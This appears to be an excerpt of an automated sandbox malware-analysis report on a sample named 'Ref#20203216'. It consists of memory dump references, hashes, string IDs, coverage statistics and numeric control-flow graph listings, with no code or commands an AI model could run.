                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'dq$4'dq
                                                                                                  • API String ID: 0-2306408947
                                                                                                  • Opcode ID: 53138d5e172b9d71196525f05f3e0b16bacc213724b2fe2f36d7f90557e73882
                                                                                                  • Instruction ID: b62d4f49386287cdf0dcf5e77b896457105029f889ac8a2e9e8f802100fe44b4
                                                                                                  • Opcode Fuzzy Hash: 53138d5e172b9d71196525f05f3e0b16bacc213724b2fe2f36d7f90557e73882
                                                                                                  • Instruction Fuzzy Hash: 1C711EB0D0060A9FD758DF6AE84169E7BF3FFC8301F14C579D009AB2A9DB7859469B40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d55fc7fe4f055ac34ca76c521b2aa6768b2b4c59c18b4edfb06cb2a8937c7ea
                                                                                                  • Instruction ID: 47d76f0369233caee1b7d99895f67ba477b44690d0fb6bae7a0ecbf6f792edb3
                                                                                                  • Opcode Fuzzy Hash: 1d55fc7fe4f055ac34ca76c521b2aa6768b2b4c59c18b4edfb06cb2a8937c7ea
                                                                                                  • Instruction Fuzzy Hash: 29913AB0D05228CFEB24DFA6C848B9DBBF6FF4A344F1094A9D019A7241D7B45986DF41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e560d285bee2bac24f7c1f29ad02194eb27c3427c45ad3e6d07a053e29030a39
                                                                                                  • Instruction ID: de7fda39f4aaa6a8e985cf2a8cfe3144172761402b64a791e5b12f84b9aa58a6
                                                                                                  • Opcode Fuzzy Hash: e560d285bee2bac24f7c1f29ad02194eb27c3427c45ad3e6d07a053e29030a39
                                                                                                  • Instruction Fuzzy Hash: 1F31D9B0E04619CBEB28CF5AC88469AFBF6BF89300F15C5EA9908A7214DB7459C5CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c5155e24ef507f7c6f6557752593f53c62cdf601bf2e37d89d82a02243a9923b
                                                                                                  • Instruction ID: 9e7f69bc92cb759671fe6f46389e31c2a59391b1c6b74c438aeee805fbf12b16
                                                                                                  • Opcode Fuzzy Hash: c5155e24ef507f7c6f6557752593f53c62cdf601bf2e37d89d82a02243a9923b
                                                                                                  • Instruction Fuzzy Hash: 232199B1D04659CBEB28CF6BC84439DFAF7AFC8300F55C4BA9518A6254DB740A858F40
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: eb4d70d56b776525d5dfdc6427c72c9ef9d3fe077124ef677f5fd853914f44db
                                                                                                  • Instruction ID: d4621f7bc111c6ad529aee04c28ac2e1621f6eb12d72c58152e82dfd1a91fe2f
                                                                                                  • Opcode Fuzzy Hash: eb4d70d56b776525d5dfdc6427c72c9ef9d3fe077124ef677f5fd853914f44db
                                                                                                  • Instruction Fuzzy Hash: CCB0922180E3C1CECB134E9585C0040BF30AA62181309C1FBC4850E447C12485C6D732
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 9206a519e61619ad1d46db0a2d6ead2e3bca9d23982bc19fa5fdd249cff6cfca
                                                                                                  • Instruction ID: 9901ec07372b89bb1bc0c1e5ae70b924df548a6e812bc69670161fcb7c9f5935
                                                                                                  • Opcode Fuzzy Hash: 9206a519e61619ad1d46db0a2d6ead2e3bca9d23982bc19fa5fdd249cff6cfca
                                                                                                  • Instruction Fuzzy Hash: 58B01230140302CE8B05DE00C5C4920FB70FF81A0031080EEC0031E821C73089C7EB02
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 1bf6c21135076003abcb51d45ea18385fd949b4fd43a25a732ad799259566305
                                                                                                  • Instruction ID: c61afecbe640ef7f9cb5604da3347d2c63a19586d280cae272d1e867cbf41f54
                                                                                                  • Opcode Fuzzy Hash: 1bf6c21135076003abcb51d45ea18385fd949b4fd43a25a732ad799259566305
                                                                                                  • Instruction Fuzzy Hash: E0B09230100202CE8B01DE108584924F370FF81A0031480EAC0031E811872089C7EB02
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 502926c432aef1c667503b6dcf0a09e67bac789901a92a40a4b16ba04f93daed
                                                                                                  • Instruction ID: c4a2b67c7695fd970d1c0ff9308b312d88c36ef0d3384a413b1dad940d413efe
                                                                                                  • Opcode Fuzzy Hash: 502926c432aef1c667503b6dcf0a09e67bac789901a92a40a4b16ba04f93daed
                                                                                                  • Instruction Fuzzy Hash: FDB0113020A200CECB00EE00E8C0B20B3B2FB8220AB38C0E8C00B0FC08C330AC82CB20

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:12.1%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:25
                                                                                                  Total number of Limit Nodes:6
                                                                                                  execution_graph 27690 12a0848 27692 12a084e 27690->27692 27691 12a091b 27692->27691 27695 12a1488 27692->27695 27701 12a1382 27692->27701 27696 12a148f 27695->27696 27697 12a1396 27695->27697 27696->27692 27698 12a1480 27697->27698 27700 12a1488 GlobalMemoryStatusEx 27697->27700 27707 12a7ea8 27697->27707 27698->27692 27700->27697 27703 12a134f 27701->27703 27704 12a138b 27701->27704 27702 12a1480 27702->27692 27703->27692 27704->27702 27705 12a1488 GlobalMemoryStatusEx 27704->27705 27706 12a7ea8 GlobalMemoryStatusEx 27704->27706 27705->27704 27706->27704 27708 12a7eb2 27707->27708 27709 12a7ecc 27708->27709 27712 696fab8 27708->27712 27716 696faa9 27708->27716 27709->27697 27714 696facd 27712->27714 27713 696fce2 27713->27709 27714->27713 27715 696fcf7 GlobalMemoryStatusEx 27714->27715 27715->27714 27718 696facd 27716->27718 27717 696fce2 27717->27709 27718->27717 27719 696fcf7 GlobalMemoryStatusEx 27718->27719 27719->27718

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 425 6963100-6963121 427 6963123-6963126 425->427 428 696314c-696314f 427->428 429 6963128-6963147 427->429 430 6963155-6963174 428->430 431 69638f0-69638f2 428->431 429->428 439 6963176-6963179 430->439 440 696318d-6963197 430->440 433 69638f4 431->433 434 69638f9-69638fc 431->434 433->434 434->427 435 6963902-696390b 434->435 439->440 441 696317b-696318b 439->441 443 696319d-69631ac 440->443 441->443 552 69631ae call 6963920 443->552 553 69631ae call 6963918 443->553 445 69631b3-69631b8 446 69631c5-69634a2 445->446 447 69631ba-69631c0 445->447 468 69638e2-69638ef 446->468 469 69634a8-6963557 446->469 447->435 478 6963580 469->478 479 6963559-696357e 469->479 481 6963589-696359c 478->481 479->481 483 69635a2-69635c4 481->483 484 69638c9-69638d5 481->484 483->484 487 69635ca-69635d4 483->487 484->469 485 69638db 484->485 485->468 487->484 488 69635da-69635e5 487->488 488->484 489 69635eb-69636c1 488->489 501 69636c3-69636c5 489->501 502 69636cf-69636ff 489->502 501->502 506 6963701-6963703 502->506 507 696370d-6963719 502->507 506->507 508 696371b-696371f 507->508 509 6963779-696377d 507->509 508->509 512 6963721-696374b 508->512 510 6963783-69637bf 509->510 511 69638ba-69638c3 509->511 523 69637c1-69637c3 510->523 524 69637cd-69637db 510->524 511->484 511->489 519 696374d-696374f 512->519 520 6963759-6963776 512->520 519->520 520->509 523->524 526 69637f2-69637fd 524->526 527 69637dd-69637e8 524->527 531 6963815-6963826 526->531 532 69637ff-6963805 526->532 527->526 530 69637ea 527->530 530->526 536 696383e-696384a 531->536 537 6963828-696382e 531->537 533 6963807 532->533 534 6963809-696380b 532->534 533->531 534->531 541 6963862-69638b3 536->541 542 696384c-6963852 536->542 538 6963832-6963834 537->538 539 6963830 537->539 538->536 539->536 541->511 543 6963856-6963858 542->543 544 6963854 542->544 543->541 544->541 552->445 553->445
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128
                                                                                                  • Opcode ID: 360fbe38a91d6aa63fdcf5a87559e4bd03580cda418f1f8e5a1859955853cf09
                                                                                                  • Instruction ID: a8879b1170dbbaef3f23428272445d80af3e388f085a810c5afddb07038d18c4
                                                                                                  • Opcode Fuzzy Hash: 360fbe38a91d6aa63fdcf5a87559e4bd03580cda418f1f8e5a1859955853cf09
                                                                                                  • Instruction Fuzzy Hash: 0F321E31E1071ACFCB14EF75C85069DB7B6BF99300F61D669D409AB264EB30AE85CB90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1101 6967df0-6967e0e 1102 6967e10-6967e13 1101->1102 1103 6967e34-6967e37 1102->1103 1104 6967e15-6967e2f 1102->1104 1105 6967e44-6967e47 1103->1105 1106 6967e39-6967e43 1103->1106 1104->1103 1108 6967e5e-6967e61 1105->1108 1109 6967e49-6967e57 1105->1109 1110 6967e84-6967e86 1108->1110 1111 6967e63-6967e7f 1108->1111 1117 6967e96-6967eac 1109->1117 1118 6967e59 1109->1118 1112 6967e8d-6967e90 1110->1112 1113 6967e88 1110->1113 1111->1110 1112->1102 1112->1117 1113->1112 1121 69680c7-69680ca 1117->1121 1122 6967eb2-6967ebb 1117->1122 1118->1108 1125 69680cc-69680d1 1121->1125 1123 69680d2-69680dc 1122->1123 1124 6967ec1-6967ede 1122->1124 1128 69680de-6968107 1123->1128 1129 696812d-696813e 1123->1129 1132 69680b4-69680c1 1124->1132 1133 6967ee4-6967f0c 1124->1133 1130 6968109-696810c 1128->1130 1137 6968123-6968127 1129->1137 1138 696813f 1129->1138 1134 6968112-6968121 1130->1134 1135 6968341-6968344 1130->1135 1132->1121 1132->1122 1133->1132 1156 6967f12-6967f1b 1133->1156 1134->1137 1145 6968140-6968184 1134->1145 1139 6968346-6968362 1135->1139 1140 6968367-696836a 1135->1140 1137->1129 1138->1125 1138->1145 1139->1140 1142 6968415-6968417 1140->1142 1143 6968370-696837c 1140->1143 1147 696841e-6968421 1142->1147 1148 6968419 1142->1148 1152 6968387-6968389 1143->1152 1153 6968315-696832b 1145->1153 1154 696818a-696819b 1145->1154 1147->1130 1151 6968427-6968430 1147->1151 1148->1147 1157 69683a1-69683a5 1152->1157 1158 696838b-6968391 1152->1158 1153->1135 1168 6968300-696830f 1154->1168 1169 69681a1-69681be 1154->1169 1156->1123 1159 6967f21-6967f3d 1156->1159 1162 69683a7-69683b1 1157->1162 1163 69683b3 1157->1163 1160 6968395-6968397 1158->1160 1161 6968393 1158->1161 1173 69680a2-69680ae 1159->1173 1174 6967f43-6967f6d 1159->1174 1160->1157 1161->1157 1166 69683b8-69683ba 1162->1166 1163->1166 1171 69683bc-69683bf 1166->1171 1172 69683cb-6968404 1166->1172 1168->1153 1168->1154 1169->1168 1181 69681c4-69682ba call 6966618 1169->1181 1171->1151 1172->1134 1189 696840a-6968414 1172->1189 1173->1132 1173->1156 1186 6967f73-6967f9b 1174->1186 1187 6968098-696809d 1174->1187 1237 69682bc-69682c6 1181->1237 1238 69682c8 1181->1238 1186->1187 1196 6967fa1-6967fcf 1186->1196 1187->1173 1196->1187 1201 6967fd5-6967fde 1196->1201 1201->1187 1203 6967fe4-6968016 1201->1203 1210 6968021-696803d 1203->1210 1211 6968018-696801c 1203->1211 1210->1173 1213 696803f-6968096 call 6966618 1210->1213 1211->1187 1212 696801e 1211->1212 1212->1210 1213->1173 1239 69682cd-69682cf 1237->1239 1238->1239 1239->1168 1240 69682d1-69682d6 1239->1240 1241 69682e4 1240->1241 1242 69682d8-69682e2 1240->1242 1243 69682e9-69682eb 1241->1243 1242->1243 1243->1168 1244 69682ed-69682f9 1243->1244 1244->1168
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq
                                                                                                  • API String ID: 0-2340669324
                                                                                                  • Opcode ID: 1bf2426fd2d873041d32ffbfa1042bddd3428fef1a01d70ac2cf83410ece8c45
                                                                                                  • Instruction ID: 1c8f83b0ff4652cad626aa8b0524501c963a6948b55b431ed06e35c080b2bbbd
                                                                                                  • Opcode Fuzzy Hash: 1bf2426fd2d873041d32ffbfa1042bddd3428fef1a01d70ac2cf83410ece8c45
                                                                                                  • Instruction Fuzzy Hash: BE028D30B003159FDB54DB69DA90AAEB7E6FF84311F208929E409DB794DB31ED46CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cf7fdac6b340a42f71a5b2a580c8f86e5d79b4c1e6a44cf2bb3a9a1f806e7744
                                                                                                  • Instruction ID: ecf70c48ec3244f66d079e3c2d7a6c5b628ffb1f8d3f1dda8e241f625599c7db
                                                                                                  • Opcode Fuzzy Hash: cf7fdac6b340a42f71a5b2a580c8f86e5d79b4c1e6a44cf2bb3a9a1f806e7744
                                                                                                  • Instruction Fuzzy Hash: 4D926534A003048FDB60CB69C584B5DB7F6FB85314F6488AAE409EB7A5DB35ED85CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8427009686c58fab23d12fcf2cfadae72ff2b1cf2a9a2ca72c9c043a55303220
                                                                                                  • Instruction ID: 5a7208251a8ab7d679135ae71370f7cb5dba53a2f0fb9a315672c7e7c1525c6f
                                                                                                  • Opcode Fuzzy Hash: 8427009686c58fab23d12fcf2cfadae72ff2b1cf2a9a2ca72c9c043a55303220
                                                                                                  • Instruction Fuzzy Hash: 1962BD30A003059FDB54DBA9D990BADB7F6EF84314F248869E80AEB754DB35EC41CB81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd179626c1209e20a21037af1ad2965b10403ebf1c68e6353b4c363c719ddd52
                                                                                                  • Instruction ID: 1769ad6bdcc6d42684d12884454938cc492f7441a4ca154d99b5e1d205c2ff61
                                                                                                  • Opcode Fuzzy Hash: dd179626c1209e20a21037af1ad2965b10403ebf1c68e6353b4c363c719ddd52
                                                                                                  • Instruction Fuzzy Hash: 93328C30B00319DFDB50DB69D990BAEB7B6EB88311F208925F449EB795DB34EC418B90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80e361233d8ccb670edc035200b8cdfccdfc5fa29234c4d903e17b2f5518492e
                                                                                                  • Instruction ID: d46385d7271dab8b0b2515ff8500795657e1eb3c04d6d4a297f0d8910aee6475
                                                                                                  • Opcode Fuzzy Hash: 80e361233d8ccb670edc035200b8cdfccdfc5fa29234c4d903e17b2f5518492e
                                                                                                  • Instruction Fuzzy Hash: ED12DF71F003058FDF64DB66D88066EB7AAFF85310F25842AE85ADB795DA34EC41CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-634254105
                                                                                                  • Opcode ID: b7f64fa36b74341638d91f13fb997dcd30145f3204f1382b68ee2d4eae06e495
                                                                                                  • Instruction ID: 896bb5f81752e04693361b3c1c3888cdfd6580690669e23e94693b756d9292e4
                                                                                                  • Opcode Fuzzy Hash: b7f64fa36b74341638d91f13fb997dcd30145f3204f1382b68ee2d4eae06e495
                                                                                                  • Instruction Fuzzy Hash: 24E18F30E1031A8FDB55DB69D4906AEB7F6FF85311F208929E809EB758DB319C42CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128
                                                                                                  • Opcode ID: 74a304767cae59b597d8b86292bf706833d1b45763204a7ff3418be4b1e4246d
                                                                                                  • Instruction ID: 79f803e8c4dc9b9340494bbb7e519d8b97695d49118628eb88523c9c5f994b6b
                                                                                                  • Opcode Fuzzy Hash: 74a304767cae59b597d8b86292bf706833d1b45763204a7ff3418be4b1e4246d
                                                                                                  • Instruction Fuzzy Hash: 15029F70E1030A8FDB64CB69D5906ADB7F6FB45310F20892AE409DBA59EB34DD51CB81

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 726 69691c0-69691e5 727 69691e7-69691ea 726->727 728 6969210-6969213 727->728 729 69691ec-696920b 727->729 730 6969ad3-6969ad5 728->730 731 6969219-696922e 728->731 729->728 733 6969ad7 730->733 734 6969adc-6969adf 730->734 738 6969246-696925c 731->738 739 6969230-6969236 731->739 733->734 734->727 735 6969ae5-6969aef 734->735 743 6969267-6969269 738->743 740 696923a-696923c 739->740 741 6969238 739->741 740->738 741->738 744 6969281-69692f2 743->744 745 696926b-6969271 743->745 756 69692f4-6969317 744->756 757 696931e-696933a 744->757 746 6969275-6969277 745->746 747 6969273 745->747 746->744 747->744 756->757 762 6969366-6969381 757->762 763 696933c-696935f 757->763 768 6969383-69693a5 762->768 769 69693ac-69693c7 762->769 763->762 768->769 774 69693f2-69693fc 769->774 775 69693c9-69693eb 769->775 776 69693fe-6969407 774->776 777 696940c-6969486 774->777 775->774 776->735 783 69694d3-69694e8 777->783 784 6969488-69694a6 777->784 783->730 788 69694c2-69694d1 784->788 789 69694a8-69694b7 784->789 788->783 788->784 789->788
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-185584874
                                                                                                  • Opcode ID: fb98725100ee3b55ce0361b0d81ea19a4216732ed0e222dbbebe54889f2d8032
                                                                                                  • Instruction ID: 3568c984a2fbb78c1648dad17ec041baeb0de89c890c346a465966a0dc57fbe8
                                                                                                  • Opcode Fuzzy Hash: fb98725100ee3b55ce0361b0d81ea19a4216732ed0e222dbbebe54889f2d8032
                                                                                                  • Instruction Fuzzy Hash: 2B915270B0031A9FDB54DF65D9907AEB7F6AFC4600F208569D80DEB788EA709D428B91

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 792 696cfb8-696cfd3 793 696cfd5-696cfd8 792->793 794 696d4a4-696d4b0 793->794 795 696cfde-696cfe1 793->795 796 696d4b6-696d7a3 794->796 797 696d26e-696d27d 794->797 798 696cfe3-696cfe5 795->798 799 696cff0-696cff3 795->799 1006 696d9ca-696d9d4 796->1006 1007 696d7a9-696d7af 796->1007 802 696d27f-696d284 797->802 803 696d28c-696d298 797->803 804 696d4a1 798->804 805 696cfeb 798->805 800 696cff5-696cff7 799->800 801 696d002-696d005 799->801 806 696d35f-696d368 800->806 807 696cffd 800->807 808 696d007-696d049 801->808 809 696d04e-696d051 801->809 802->803 810 696d9d5-696d9ee 803->810 811 696d29e-696d2b0 803->811 804->794 805->799 813 696d377-696d383 806->813 814 696d36a-696d36f 806->814 807->801 808->809 815 696d053-696d095 809->815 816 696d09a-696d09d 809->816 828 696d9f6-696da0e 810->828 829 696d9f0-696d9f5 810->829 830 696d2b5-696d2b8 811->830 818 696d494-696d499 813->818 819 696d389-696d39d 813->819 814->813 815->816 822 696d0e6-696d0e9 816->822 823 696d09f-696d0e1 816->823 818->804 819->804 847 696d3a3-696d3b5 819->847 826 696d132-696d135 822->826 827 696d0eb-696d12d 822->827 823->822 831 696d137-696d14d 826->831 832 696d152-696d155 826->832 827->826 838 696da10-696da13 828->838 829->828 836 696d301-696d304 830->836 837 696d2ba-696d2fc 830->837 831->832 844 696d157-696d15c 832->844 845 696d15f-696d162 832->845 842 696d306-696d348 836->842 843 696d34d-696d34f 836->843 837->836 848 696da46-696da49 838->848 849 696da15-696da41 838->849 842->843 857 696d356-696d359 843->857 858 696d351 843->858 844->845 851 696d164-696d173 845->851 852 696d1ab-696d1ae 845->852 879 696d3b7-696d3bd 847->879 880 696d3d9-696d3db 847->880 853 696da4b call 696db2d 848->853 854 696da58-696da5b 848->854 849->848 863 696d175-696d17a 851->863 864 696d182-696d18e 851->864 867 696d1f7-696d1fa 852->867 868 696d1b0-696d1f2 852->868 873 696da51-696da53 853->873 865 696da7e-696da80 854->865 866 696da5d-696da79 854->866 857->793 857->806 858->857 863->864 864->810 872 696d194-696d1a6 864->872 876 696da87-696da8a 865->876 877 696da82 865->877 866->865 882 696d243-696d246 867->882 883 696d1fc-696d23e 867->883 868->867 872->852 873->854 876->838 890 696da8c-696da9b 876->890 877->876 892 696d3c1-696d3cd 879->892 893 696d3bf 879->893 895 696d3e5-696d3f1 880->895 886 696d248-696d264 882->886 887 696d269-696d26c 882->887 883->882 886->887 887->797 887->830 916 696db02-696db17 890->916 917 696da9d-696db00 call 6966618 890->917 900 696d3cf-696d3d7 892->900 893->900 919 696d3f3-696d3fd 895->919 920 696d3ff 895->920 900->895 917->916 927 696d404-696d406 919->927 920->927 927->804 930 696d40c-696d428 call 6966618 927->930 945 696d437-696d443 930->945 946 696d42a-696d42f 930->946 945->818 948 696d445-696d492 945->948 946->945 948->804 1008 696d7b1-696d7b6 1007->1008 1009 696d7be-696d7c7 1007->1009 1008->1009 1009->810 1010 696d7cd-696d7e0 1009->1010 1012 696d7e6-696d7ec 1010->1012 1013 696d9ba-696d9c4 1010->1013 1014 696d7ee-696d7f3 1012->1014 1015 696d7fb-696d804 1012->1015 1013->1006 1013->1007 1014->1015 1015->810 1016 696d80a-696d82b 1015->1016 1019 696d82d-696d832 1016->1019 1020 696d83a-696d843 1016->1020 1019->1020 1020->810 1021 696d849-696d866 1020->1021 1021->1013 1024 696d86c-696d872 1021->1024 1024->810 1025 696d878-696d891 1024->1025 1027 696d897-696d8be 1025->1027 1028 696d9ad-696d9b4 1025->1028 1027->810 1031 696d8c4-696d8ce 1027->1031 1028->1013 1028->1024 1031->810 1032 696d8d4-696d8eb 1031->1032 1034 696d8ed-696d8f8 1032->1034 1035 696d8fa-696d915 1032->1035 1034->1035 1035->1028 1040 696d91b-696d934 call 6966618 1035->1040 1044 696d936-696d93b 1040->1044 1045 696d943-696d94c 1040->1045 1044->1045 1045->810 1046 696d952-696d9a6 1045->1046 1046->1028
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq
                                                                                                  • API String ID: 0-2861643491
                                                                                                  • Opcode ID: 0c45c15c984d3b0c30769967aa3a0c602af5ecf00bd4287523a6529b728edeee
                                                                                                  • Instruction ID: 78c6de67c8a9fc56e73e981000c169ea1283bca397fd455d5dbd2050f817746a
                                                                                                  • Opcode Fuzzy Hash: 0c45c15c984d3b0c30769967aa3a0c602af5ecf00bd4287523a6529b728edeee
                                                                                                  • Instruction Fuzzy Hash: 5F624E30B0031A8FCB54EB69D590A5EB7E2FF84315B208A69E419DF758DB71ED46CB80

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1054 6964c10-6964c34 1056 6964c36-6964c39 1054->1056 1057 6964c5a-6964c5d 1056->1057 1058 6964c3b-6964c55 1056->1058 1059 6964c63-6964d5b 1057->1059 1060 696533c-696533e 1057->1060 1058->1057 1078 6964d61-6964dae call 69654b8 1059->1078 1079 6964dde-6964de5 1059->1079 1062 6965345-6965348 1060->1062 1063 6965340 1060->1063 1062->1056 1064 696534e-696535b 1062->1064 1063->1062 1092 6964db4-6964dd0 1078->1092 1080 6964deb-6964e5b 1079->1080 1081 6964e69-6964e72 1079->1081 1098 6964e66 1080->1098 1099 6964e5d 1080->1099 1081->1064 1095 6964dd2 1092->1095 1096 6964ddb 1092->1096 1095->1096 1096->1079 1098->1081 1099->1098
                                                                                                  Strings
                                                                                                  Memory Dump Source
